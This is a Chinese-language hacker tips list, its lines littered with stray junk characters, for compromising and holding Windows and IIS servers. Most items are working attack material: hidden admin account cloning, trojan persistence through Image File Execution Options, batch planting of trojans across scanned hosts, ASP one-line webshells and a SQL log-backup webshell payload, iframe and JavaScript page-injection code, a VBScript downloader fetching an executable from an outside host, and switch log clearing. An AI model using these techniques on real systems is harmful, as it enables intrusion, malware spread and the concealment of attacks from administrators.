Xp系统修改权限防止病毒或木马等破坏系统,cmd下," k& R! ?" p; q, [
cacls C:\windows\system32 /G hqw20:R! F) o" s9 L; h+ N
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入+ g* _2 v6 C$ r) ?% q% \, c
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F. ?7 s& `' _# ~, W% N$ f
3 b+ L: a6 k7 k8 H6 s$ b2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 j: T7 ?/ J2 `( Y& m/ ?
; R, V1 y$ c/ |4 H$ T8 n3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& G5 @" i. x3 ?: Y j
8 t5 s# i P) A# e, [3 I4 R
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ [" F$ Z4 ~) d3 `$ O! Q7 r, k2 z3 O; L6 J9 j; d
5、利用INF文件来修改注册表$ {2 w5 m. M( i3 e) g& m- w3 I
[Version]
: @0 N- {2 D- z WSignature="$CHICAGO$"
, y% F' B' M- ~4 `3 ~[Defaultinstall]; e% X: X% e" P6 h. @) P& {5 n
addREG=Ating
3 v: M4 K: n, `; k$ ]: F9 Y# p[Ating]
: ?7 E3 O2 E3 ~- hHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1". A' |/ U. `8 i- n4 a
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* P0 r5 ~% Z6 _# r% f' [# [: [rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 _# H; P! ~ O- j/ H其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU8 |* `! W0 b) z w: T
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
' c; I( K! U& | _+ t @3 A8 FHKEY_CURRENT_CONFIG 简写为 HKCC: N, a/ G& F& n& q1 A
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" ?$ B7 Y$ ` S8 } \; y( R% z
"1"这里代表是写入或删除注册表键值中的具体数据+ r/ }8 R/ W* k( x
# r' |7 _" K+ c, t* p' w' q
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,+ j* |* \ N% Y& u% G( ]
多了一步就是在防火墙里添加个端口,然后导出其键值
$ J5 u6 E1 L. {7 F, ~[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]: F' y u/ x1 G- G" M
4 K' N) R' V! Y& H4 g7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽, L& f7 { j* k" ?8 T
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
1 Q0 C- {3 I( y
% E$ h! W5 ~: y1 q* p8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。& E4 h4 W0 \- A
0 L' T/ y( H: I+ e! L' ~3 p' S
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,. Y4 U4 A: F( ^! ^
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
" c4 C2 j+ G1 O {2 E$ ^
5 u4 E2 T* Q. a0 M10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”2 @$ @# u3 \6 ]0 @ q" `
4 _# u: ?5 L" Y! I; d
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
5 A" A! L) b" F+ o用法:xsniff –pass –hide –log pass.txt% @. s; W& @) l6 Q; t
3 f3 z! r5 r" `) q. g% {! i
12、google搜索的艺术4 J# `. X( Y! G9 V$ |# ]2 L
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
# X5 ?9 `/ \. U# P或“字符串的语法错误”可以找到很多sql注入漏洞。
% ?6 h1 E7 v9 R' w4 m5 a# s; k8 Z6 M9 t/ o5 p: R* w
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- h. i* v B& B, E' @+ L* K# p6 p
5 W9 E, F, ^' Z) O: y14、cmd中输入 nc –vv –l –p 1987
0 s9 P6 G/ Z2 x9 w做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
, F5 x8 V/ C3 y' ?! `
% ?7 g& `$ W. T) c/ p& W15、制作T++木马,先写个ating.hta文件,内容为( Y; A! m1 K/ u
<script language="VBScript">
: g$ s' s P' i" cset wshshell=createobject ("wscript.shell" )
! K I) E3 I: u7 \+ _a=wshshell.run("你马的名称",1)
; B4 B) ?6 t& w# A J% n# }, Lwindow.close
) f. p1 g% \" e! |</script>
f5 T% r/ {# Y; D% }0 f6 I再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
9 k, {; e" ^6 }8 ?, E( [
/ @! f' F! w, A" }) T16、搜索栏里输入
, M# @# @3 M& f3 B关键字%'and 1=1 and '%'='
# Y6 B; D m+ w- E8 c. m关键字%'and 1=2 and '%'='
& H/ h8 c% Z. c9 { [7 C& Z比较不同处 可以作为注入的特征字符- _! Q8 X( ]! x7 J- g7 O6 N
' f0 F, _0 \# l4 T
17、挂马代码<html>( u# V8 a9 l; c% f
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>+ V( ^$ o. I/ ^) P& I* P' B/ l
</html>
: q. m$ \ B# W: D! ]1 H& z/ z1 f9 \7 I h6 C. J& @- x% {4 v
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
O6 }% R2 r% n" G* rnet localgroup administrators还是可以看出Guest是管理员来。/ \! B* q" s: Z! T% f9 i1 ^: o
5 M2 }+ f+ i6 G N: R1 A19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等 m$ Y. Z) N4 x* x4 T4 W# l
用法: 安装: instsrv.exe 服务名称 路径
1 K) B1 o/ b& k; G# _, c. Y卸载: instsrv.exe 服务名称 REMOVE
/ Z+ P5 w: z0 ~: z" F# M
/ N& m' m; R; ]& b
" ~2 y1 V. y: i* p2 m21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
- x+ F( ^1 F1 N" n不能注入时要第一时间想到%5c暴库。: `' ^' y5 H: t: J& m( _6 j: |
6 r5 D0 L/ q+ b! U. T6 ~, l" s22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ n0 a. `# i" u
`' ] k; G K* a23、缺少xp_cmdshell时
* K4 {% b) K6 }( D尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 @- f E+ w" v# P假如恢复不成功,可以尝试直接加用户(针对开3389的)
; K: d+ |, T3 A" J& x, ydeclare @o int7 X. ~& W& ~" G8 u# _9 {
exec sp_oacreate 'wscript.shell',@o out/ ]/ c P) R4 W3 [ z
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 l7 |% L/ Q, d
: a$ R* P2 v0 E' E: M/ H5 l9 ~9 F24.批量种植木马.bat
2 Z% x2 X! }8 _4 t; b8 Hfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 l/ \' f( k, N0 u- p. Ufor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间9 u* V! M, b3 Z$ G) K! I- ~4 f
扫描地址.txt里每个主机名一行 用\\开头
. I3 T9 N) }) c; T
) E3 c) \: q+ y7 @' j25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* F( B" L9 D6 l3 `) e/ \2 H2 M) k4 f8 @: B; D; X+ Y. B- C8 {1 V
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ S, e0 n7 G9 h* N+ U. Q
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( @% j" F3 s% C, [5 t1 O( s
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- Z+ Z* h& [# d; X5 w9 b6 ]
" {% u. B; P$ D( s' ~6 H27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
9 e+ c: ]- d" ?5 g0 m# z3 B0 v2 i然后用#clear logg和#clear line vty *删除日志) B" x2 S* S/ x \7 c2 I
, ~# [: {" h O28、电脑坏了省去重新安装系统的方法
: c0 C, z- P8 b纯dos下执行,# z8 [. p: ]; c2 K/ V% `
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
) U4 W+ k9 }1 g2 L+ E7 U2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
+ r% b% S' |% I4 n) ~
, |2 _. j+ w. g, o7 X3 Y# e29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 v0 z$ ]; a+ ?* i w0 h! iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
7 D! j' P' x2 ~9 @3 ^6 S6 wHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% u: y$ O( R1 g# LHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ _. k* h0 X5 P% O9 @* R分别用
0 u3 E2 ?9 [. }2 vregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( S, F: E% y" a$ `/ o. o' cregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 p0 a& H; D/ h
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 p/ R7 S: l) j+ I: P
命令来导出注册表项
+ j. L' A. A& _5 o9 h+ m8 [; ~0 c+ W然后把三个文件里的EnableSecurityFilters"=dword:00000001,, i5 u. S' i3 s+ \
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
- m8 v, i* i% W2 aregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
" ^- ^7 J3 p/ Z) ~& D D' T. U* C# C" {) R6 H& P
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U/ @3 G8 K" F* _/ a# T$ W
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的32 J5 A; H; a. R; H6 K
) d& l- O( P. T p# g31、全手工打造开3389工具8 f; w3 s. `& X$ |2 Y
打开记事本,编辑内容如下:% d- e0 o: V& J( N
echo [Components] > c:\sql4 t [9 j; X/ C) t6 ]
echo TSEnable = on >> c:\sql
0 | o+ R; M* q8 h, U% [* ]7 Qsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
* Y9 ?! ~! b- k编辑好后存为BAT文件,上传至肉鸡,执行! E& O# T% g+ Q
1 Q. w& v$ E7 l' C f9 s Y) R32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 L/ U8 _& }" q9 j# t) s
. J% x& _* V/ a: H, u- i, F
33、让服务器重启! @) R" @, o+ ?' O0 h6 v
写个bat死循环:
; }; D. N: W' F@echo off5 Y/ U) A B+ {" `. O% f
:loop1* `6 m1 t/ s& ~- I/ |
cls
6 A. x5 S$ `0 o0 T @start cmd.exe; X2 _$ h+ A3 j7 |0 p
goto loop1
. [6 Q: R: E6 ?7 ?: k5 H' i保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) i* n: I2 Z5 @0 i: f) L& o2 ?9 V- Y( ^, s) a' X% h3 e. ?: n
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
3 N3 f! t6 p4 z/ f5 d@echo off ~; ~# K6 n; Z7 ^% f: w2 g
date /t >c:/3389.txt+ G4 a$ x3 S6 m4 i
time /t >>c:/3389.txt6 p# C$ U2 {2 T# B1 P& z6 w* W
attrib +s +h c:/3389.bat. C, y2 d/ k# _( V6 F! o
attrib +s +h c:/3389.txt
9 p/ N' Z+ l* B$ d I% t; G$ _netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
1 i z% x" B+ V# n% Y0 F( d1 B并保存为3389.bat
9 S/ R4 z, T- M, i7 @打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
8 N* z+ {9 S6 K4 Q* J8 `
, Z. P2 t0 p& w* F2 k1 z35、有时候提不了权限的话,试试这个命令,在命令行里输入:' J4 `$ G; y6 {& j
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)7 e0 h8 y R4 L& t I8 q5 ?" B2 g
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。" p1 ?) i1 e$ P8 t" R% t0 z
: G7 _( h1 j$ h7 F- z/ w/ O
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件3 }5 J2 A5 y' T8 D% R% V
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址# y# u8 `: F. u) t8 s
echo 你的FTP账号 >>c:\1.bat //输入账号
& o' v4 K% z$ Q V8 [* ^2 Z2 @2 k2 |echo 你的FTP密码 >>c:\1.bat //输入密码
, n8 W5 P) g0 R% [echo bin >>c:\1.bat //登入* R% {8 ?5 c; z) K
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
3 b. d4 U( ]. A. T/ Q! i8 Kecho bye >>c:\1.bat //退出
4 A3 t1 k% k6 E然后执行ftp -s:c:\1.bat即可) Z2 w. F# w1 [3 l7 u2 O# V
% U9 a, }9 c8 K# y5 }8 |37、修改注册表开3389两法
6 ^: U1 L0 U5 `1 L2 ]% |(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
7 b5 l% |/ h5 f( C8 Zecho Windows Registry Editor Version 5.00 >>3389.reg3 u# y' ^9 b8 |/ L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
, W& u {$ A3 J% f7 M- Pecho "Enabled"="0" >>3389.reg
4 T' f( F1 L- l) Y, q/ m( Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, E- H# B6 l. p2 p: q" B! xNT\CurrentVersion\Winlogon] >>3389.reg
5 w1 @: A7 R8 i% |0 becho "ShutdownWithoutLogon"="0" >>3389.reg
& Y$ x) Y8 @. n: ]! G/ Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 V! k. n3 z& ~6 @% b, E
>>3389.reg
/ e5 M- J$ a5 q5 I9 [echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg- Z. B( g" |( U6 ]* L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]" ^( v7 z+ _+ V. r5 `" E- r% p
>>3389.reg
+ e% m( G3 C) B6 u. mecho "TSEnabled"=dword:00000001 >>3389.reg+ m0 K0 [6 R/ f, `) x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
* u1 v% N- W8 \. g j5 Xecho "Start"=dword:00000002 >>3389.reg
& t2 Y) m5 v4 r& V! l7 kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 X; a% R- A: R9 b/ r>>3389.reg
: V: g2 \ e. d0 P- Wecho "Start"=dword:00000002 >>3389.reg- [4 D6 y' X s5 L2 U3 Q( r: X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg4 Z* q1 z u% f3 w% c8 p; n
echo "Hotkey"="1" >>3389.reg* E9 A# |0 @" q( _: |4 Q2 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" L5 i6 V7 w/ U3 a3 r
Server\Wds\rdpwd\Tds\tcp] >>3389.reg/ c( w3 L' v: o! |, s5 t+ T: j' K
echo "PortNumber"=dword:00000D3D >>3389.reg
: c1 d% A. E% O* }4 M* Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" P+ Q1 P6 B* ]3 w9 \! n+ a
Server\WinStations\RDP-Tcp] >>3389.reg* q# y) ^) Y+ C( H# w0 H
echo "PortNumber"=dword:00000D3D >>3389.reg5 z2 V# @+ E2 \; e5 s1 }
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
- `' J% s; R7 A) m(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- D+ S Z* n2 ]( P+ `因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
7 F5 \; k* P" f3 M) K2 X+ p" o6 U; G(2)winxp和win2003终端开启
4 C$ k( ?7 P7 U% l! O用以下ECHO代码写一个REG文件:0 k+ }" u4 s. H# l7 q' K. _
echo Windows Registry Editor Version 5.00>>3389.reg
0 Q0 ]6 n' J- }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( b5 n) a+ C$ I! `/ o1 m- UServer]>>3389.reg
+ O, N1 i% } h7 B! O: Eecho "fDenyTSConnections"=dword:00000000>>3389.reg. |$ d0 Q, o, a! r$ V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 _' W! I T6 \8 R N7 dServer\Wds\rdpwd\Tds\tcp]>>3389.reg
" k( [) I6 [+ Uecho "PortNumber"=dword:00000d3d>>3389.reg
4 w& v5 E8 x6 ^5 P* z& {- cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 ^+ U3 g7 i5 z0 T: [Server\WinStations\RDP-Tcp]>>3389.reg' x9 M: V4 F. B9 G/ x
echo "PortNumber"=dword:00000d3d>>3389.reg; ?, Q8 J! ?9 l
然后regedit /s 3389.reg del 3389.reg8 `! k/ A" o N7 Y) I8 C, I
XP下不论开终端还是改终端端口都不需重启" A$ R: G- f4 B
9 ~3 b7 U" z2 x% n+ e, ^38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃* P) {8 l( v& R
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', m. y/ o) q, \! Y8 x
0 @* w* T Z, [- S* B) J; F4 w
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!4 B# v2 W7 w! z0 D
(1)数据库文件名应复杂并要有特殊字符
4 `( h6 G7 ~ F" J& U- b' `(2)不要把数据库名称写在conn.asp里,要用ODBC数据源/ f; ]+ O/ `" H! x2 @! I4 E, L
将conn.asp文档中的" Y% c3 x+ O% z+ `/ B
DBPath = Server.MapPath("数据库.mdb")! Y+ d% F2 P" f7 \" n& M* i2 P+ H2 b
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 a S2 ^- z" H* ~
# y2 S3 P3 @) ]7 M( v& S- y- g
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置+ a5 m- k& D0 ^! V4 O9 o8 p
(3)不放在WEB目录里' c3 O4 L7 A, e
; {7 c6 \0 c8 d4 S8 h/ N _/ [40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
% f/ @9 e+ E. J2 I# P$ G; q可以写两个bat文件! J3 v, q) t$ W9 K
@echo off4 M, L( U8 }" z- L
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe- e; b2 Z6 g. }% a& Z9 c
@del c:\winnt\system32\query.exe @, t* U- \% M6 v# @3 R
@del %SYSTEMROOT%\system32\dllcache\query.exe0 g, }! {1 T* d8 N9 M9 r; w( D* e6 b
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的- r; @1 M5 F, A7 `
4 `0 T& }+ x9 H! p8 m@echo off6 x+ _! _/ [6 O; q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
) X# G! s: G2 v% S3 ^@del c:\winnt\system32\tsadmin.exe
& ]: L2 O) S% Z F, a( E- w$ L, v@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex+ v( Q! }0 u9 T5 x8 h
. B. O: _( g3 v0 R% D41、映射对方盘符! c A# I" `4 P* m6 n. [% M
telnet到他的机器上,
7 L9 r3 e: _) Y2 a' gnet share 查看有没有默认共享 如果没有,那么就接着运行
& r3 c- R" u! ?7 Y" L+ \net share c$=c:
$ n2 ]- n" b3 S5 `3 dnet share现在有c$- ]5 Z. U# B$ H9 c) Y2 }" F7 o
在自己的机器上运行
" z% h( d L5 o/ i* lnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
: G6 J# F {( F! m! Y4 l2 L4 d7 l* t ?- u' F; J5 F
42、一些很有用的老知识0 l8 a' [- d4 H- t
type c:\boot.ini ( 查看系统版本 )
5 E/ a {$ c3 i: h) }! cnet start (查看已经启动的服务)
( ?7 ~( l+ R' U0 Fquery user ( 查看当前终端连接 )" I: ^& K) n$ R3 I3 q \' X
net user ( 查看当前用户 )
' [5 e8 {+ D: Bnet user 用户 密码/add ( 建立账号 )1 O B" f* S# t
net localgroup administrators 用户 /add (提升某用户为管理员)' i( ^9 F; `4 Q7 Q3 f
ipconfig -all ( 查看IP什么的 )
5 z! V* M( |4 g6 anetstat -an ( 查看当前网络状态 )
; {5 e+ `+ x, cfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
6 x. E+ y. `; h4 w克隆时Administrator对应1F4: Y: K8 Q+ A* ?1 X4 X& x
guest对应1F59 |% ]4 E+ F' ^* Y, n0 w
tsinternetuser对应3E8
2 p0 K6 t `! p) L
- m3 _, b% A& K) `43、如果对方没开3389,但是装了Remote Administrator Service8 @% a/ e+ B1 w! ~: t5 G6 B: s2 F
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
' e# w: C. M7 A: M' h解释:用serv-u漏洞导入自己配制好的radmin的注册表信息( ^2 Q0 U4 |; p1 h
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"( \. X8 x9 |2 g1 P3 s
8 B3 Q9 B* K! P44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" I! J( m) [ v7 @. J8 f
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 v, l' G) w) U
0 F0 i6 O3 d, F4 ]+ e( f9 Q, e45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: G+ i: z- n4 i. techo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# N, G% v! e; b$ Z: \7 y1 R) p^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =3 w4 c0 g0 Q7 }7 h
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =2 ]- ?8 E. `) ?. c
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
8 Z( C! X* B7 k9 f7 R; N) Z; Y6 r* f(这是完整的一句话,其中没有换行符)
4 E" J: X9 P( s: B9 a然后下载:
7 E2 a! a% ?( g: ^3 P kcscript down.vbs http://www.hack520.org/hack.exe hack.exe7 N: B4 s* R3 V ]; B" ?( s
1 g6 C/ p9 ~, y46、一句话木马成功依赖于两个条件:8 Z- z8 d% }1 D! [$ ], c/ K
1、服务端没有禁止adodb.Stream或FSO组件9 e" z: q) J( d6 \5 G; }' C
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 }$ K: F q# H( H5 `' G1 {. A$ x+ Z% e3 C9 L# c, a W
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
0 | S% y+ f. ~+ G0 c; [( F;alter database utsz set RECOVERY FULL--
o8 _% c# e. X. }* B;create table cmd (a image)--
! B$ d1 x3 W$ B;backup log utsz to disk = 'D:\cmd' with init--6 N. G& Q- j7 [, a1 G2 c. ~2 {
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. m: D, Y+ v! ~& p1 p: h;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& r. p; S$ u; O$ d( m+ m+ t, G
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。# R. ]% z- Y# f/ T% F
2 d7 {% f. N! Y; ]& t( N$ X# c5 M
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:3 t f3 j% _# q! D7 R8 f+ ~
, k8 Y P) o4 k6 Z- F% y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options5 E5 y, k, |% x6 U8 z3 w7 J5 w
所有会话用 'all'。; y" `8 N n4 Z6 i) R: S
-s sessionid 列出会话的信息。
5 V; l- e; p# n* [8 a-k sessionid 终止会话。
+ b' s* v8 r( r+ m: x# k-m sessionid 发送消息到会话。
) W7 B+ _! g: J& j8 e4 i
. |, f: L' Q, Bconfig 配置 telnet 服务器参数。& J- d6 d# |0 t2 i% b) N) L
8 P1 M/ @5 H0 u0 k7 _/ w: S1 N
common_options 为:
# ^$ R" |$ U) {1 ^$ w" D8 z' l0 Y( k7 |-u user 指定要使用其凭据的用户
# t; G3 h% H1 g0 X" I-p password 用户密码. k2 u* t8 r" \, s
8 r- e {( v4 ~& Tconfig_options 为:
" q, |! f7 ^5 v9 r+ E! N! a2 [dom = domain 设定用户的默认域
/ Z0 P* v. K1 ?; C( @) Wctrlakeymap = yes|no 设定 ALT 键的映射% `9 _3 t {; m* B' m0 P2 h- E
timeout = hh:mm:ss 设定空闲会话超时值
) n W- x" _" c5 X# D+ G- etimeoutactive = yes|no 启用空闲会话。3 {, A; k9 M* K* \: p/ b; \
maxfail = attempts 设定断开前失败的登录企图数。1 a% \5 O* Q4 E C
maxconn = connections 设定最大连接数。5 n6 G6 O: G0 x& M9 l4 J
port = number 设定 telnet 端口。! @( S- _0 Q" l9 m1 G4 u
sec = [+/-]NTLM [+/-]passwd
/ U% T/ v; t, z设定身份验证机构" ~3 R* ~. u+ M1 [0 g& K4 D; q
fname = file 指定审计文件名。
% V @, ]8 p1 r0 Ofsize = size 指定审计文件的最大尺寸(MB)。$ u! q9 R2 h: n2 f+ F2 T3 i" e
mode = console|stream 指定操作模式。3 k9 E' T1 s$ R' m" I$ I. b/ b
auditlocation = eventlog|file|both
. T: V9 u6 [+ W$ v6 k* A' V% X指定记录地点
# R& ^* m. Q. L" \8 laudit = [+/-]user [+/-]fail [+/-]admin
0 U9 T# A7 c' T- v0 {# ~0 `: t- ~. `! u a) ~ Q8 m- }1 Q0 e H8 @
49、例如:在IE上访问:0 ?& Q5 m" K" d; l
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/8 Z3 |. o) u1 w- f
hack.txt里面的代码是:. c) y; o: C; o' \3 \* s
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
% Y1 T2 G; t1 E; q把这个hack.txt发到你空间就可以了! m, Q- K2 }# V
这个可以利用来做网马哦!7 Z; q, X' N- a4 L, c0 ^
6 O0 i* o+ r2 ^: c
50、autorun的病毒可以通过手动限制!
) b1 k; v) N2 i% W1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!. H$ t- E/ d5 y: S. D* T4 a
2,打开盘符用右键打开!切忌双击盘符~
3 @ c0 T, f1 W' ^! Q3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 E* w% g( P# F
0 Z; U" v& c% ]+ h51、log备份时的一句话木马:" C* `& f7 c7 T/ \( }
a).<%%25Execute(request("go"))%%25>
: Q: C4 V. F; }b).<%Execute(request("go"))%>
% D( U! [2 l; b+ N( Qc).%><%execute request("go")%><%! m( i9 f( G! L' W% o& N) ]7 x3 c3 z P
d).<script language=VBScript runat=server>execute request("sb")</Script>& ?6 |4 `$ Q+ Y' O6 w# U5 E* U
e).<%25Execute(request("l"))%25>1 v, c1 F5 \5 n5 x' Z( A) M% P6 ]
f).<%if request("cmd")<>"" then execute request("pass")%>) e% g6 A2 U4 |1 [2 y( p
: U% \! i; W% H) b9 C
52、at "12:17" /interactive cmd5 r, I$ m" w: L; x+ D$ l5 v
执行后可以用AT命令查看新加的任务5 f8 S" w& z$ _9 F( i
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
( i" d9 b+ f. E; W& q3 t2 I2 J
